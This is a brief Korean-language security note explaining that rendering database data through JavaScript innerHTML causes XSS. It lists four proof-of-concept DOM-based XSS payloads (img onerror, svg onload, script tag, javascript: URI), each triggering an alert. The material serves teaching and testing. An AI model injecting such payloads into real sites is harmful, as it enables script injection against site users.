JavaScript innerHTML로 DB 데이터를 그대로 렌더링하면 XSS 발생
💡 DOM-based XSS 페이로드: • <img src=x onerror=alert('XSS')> • <svg onload=alert('XSS')> • <script>alert('XSS')</script> • javascript:alert('XSS')
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<script>alert('XSS')</script>
javascript:alert('XSS')